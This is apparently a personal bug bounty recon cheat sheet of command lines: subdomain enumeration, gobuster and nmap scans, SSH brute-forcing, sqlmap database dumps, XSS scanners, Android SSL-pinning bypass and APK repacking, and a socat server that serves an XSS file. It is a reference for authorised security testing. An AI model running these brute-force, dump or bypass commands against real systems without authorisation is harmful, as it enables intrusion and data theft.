Recon portion of my approach to bug bounties. It's a WIP

tools

find . -type f -name "*.body"
find . -type f -name "*.body" | html-tool tags title | vim -

ggrep -Hrni ""
ggrep -hri ""

%! sort -u --version-sort

onaws domain.com
subfinder -d dommain.com | dnsx -req

~ ~ Bug Bounty Recon Pipeline ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~

amass enum -d owasp.org
amass db -names -d owasp.org
amass db -summary -d owasp.org
amass db -show -d owasp.org
amass db -names -src -d mytarget.com
amass intel -active -whois -d owasp.org

cat wildcards | assetfinder --subs-only | anew domains
cat wildcards | findomain --stdin --output 
cat domains | httprobe -c 80 --prefer-https | anew httprobe.out
cat findomain.out | anew domains | httprobe -c 50 | anew hosts
cat hosts | fff -d 1 -S -o roots 
comb <(echo https://some.url) ~/recon/files/short-wordlist.txt | fff -s 200

cat final | rev | cut -d . -f 1-3 | rev | sort -u | tee root.subdomains

waybackurls domain.com

gobuster dir -u <url -w <path-to-wordlist> -x <extension> -k dirscan.txt
gobuster dir -u http://192.168.38.20 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
gobuster dir -u https://www.domain.com -w /home/user/bounty/awesome-wordlists/wordlists/discovery/directory_only_one.small.txt --wildcard

nmap -sC -sV -p- 1.1.1.1
nmap -sV -Pn -n 1.1.1.1
nmap 192.168.1.0/24 -p 22 --open
nmap 192.168.254.13 -p 22 --script ssh-brute --script-args userdb=users.txt,passdb=passwords.txt
nmap -p 22 --script ssh-brute --script-args userdb=users.lst,passdb=pass.lst \
       --script-args ssh-brute.timeout=4s <target>

" https://github.com/tijme/angularjs-csti-scanner
acstis -d "https://finnwea.com/some/page/?category=23"

" https://github.com/hahwul/XSpear
xspear -u 'https://www.hahwul.com/?q=123' --cookie='role=admin' -v 1 -a 
~ ~ Mobile  ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~

" Frida
frida-ps -U

" SSL Pinning Bypass for Android
 frida -U  -no-pause --codeshare pcipolloni/universal-android-ssl-pinning-bypass-with-frida -f YOUR_BINARY
 
" Objection
https://github.com/sensepost/objection

" MobSF
mobsf.github.io

" get arch version
adb shell getprop  ro.product.cpu.abi

" Call Intent / Activity 
adb shell am start -n com.android.insecurebankv2/com.android.insecurebankv2.PostLogin

adb shell settings put global http_proxy localhost:8082
adb reverse tcp:3333 tcp:8082

adb push ./burp-android-cert.cer /sdcard/Download/

adb push /path/to/frida-server /data/local/
adb shell chmod 777 /data/local/tmp/frida-server
adb shell /data/local/tmp/frida-server

# Using ADB, call the android exported activity.
adb shell am start -n com.android.insecurebankv2/com.android.insecurebankv2.PostLogin

apktool d InsecureBankv2
" recompile .apk
apktool b -f -d InsecureBankv2/
keytool -genkey -v -keystore ctf.keystore -alias ctfKeystore
 -keyalg RSA -keysize 2048 -validity 1000
 
sqlmap http://35.227.24.107/e48623ef7c/login --data "username=a&password=b" --dbms=mysql --dbs
sqlmap http://35.227.24.107/e48623ef7c/login --data "username=a&password=b" --dbms=mysql --dbs -D level2 -T admins --dump

dnsrecon.py -d domain.com

./real_ip_discover.py "site.com" 0.0.0.0/24 "<title>Welcome to site.com"
" Get Ranges
https://www.cloudflare.com/ips-v4


tldr curl
tldr awk

 FILE=xss.jpg;socat -v -d -d TCP-LISTEN:80,fork "SYSTEM:/bin/echo 'HTTP/1.1 200 OK';/bin/echo 'Content-Length: '`wc -c<$FILE`;/bin/echo 'Content-Type: image/png';/bin/echo 'Content-Type: text/html';/bin/echo;dd 2>/dev/null<$FILE"